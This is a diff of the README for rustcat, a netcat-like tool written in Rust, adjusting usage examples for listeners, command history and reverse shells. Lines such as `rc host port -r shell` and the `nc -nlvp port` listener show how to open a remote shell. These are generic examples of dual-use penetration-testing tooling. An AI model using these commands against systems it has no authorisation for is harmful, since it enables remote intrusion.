robiot/rustcat/README.md

 ## 👶 Everything Easy
 ![Ex](https://raw.githubusercontent.com/robiot/rustcat/main/img/easy-revshell.gif)
 Starting a listener is just as simple as `rc -lp port`.
-While in netcat you would do something like `nc -nlvp port`.
+While in netcat you would do something like `nc -nlvp port` to get the same results.

-And creating a reverse shell has never been easier, `rc -rp port shell` is all you need.
+And creating a reverse shell has never been easier, `rc host port -r shell` is all you need.
 No more long /dev/tcp stuff that you always forget.

 ## 📃 Command History
 ![Appearance](https://raw.githubusercontent.com/robiot/rustcat/main/img/history-ex.gif)
 Command history is something we all need.
 How annoying isn't it when you accidently type a long command wrong, then you have to rewrite the entire thing.

 But Rustcat fixes that with command history.
-Just add -H and you will get command history (`rc -lpH port`), unlike netcat where you have to use another application and do `rlwrap -cAr nc -nlvp port`.
+Just add -H and you will get command history (`rc -lHp port`), unlike netcat where you have to use another application and do `rlwrap -cAr nc -nlvp port`.

 ## 🎨 Appearance
 ![Appearance](https://raw.githubusercontent.com/robiot/rustcat/main/img/easy.png)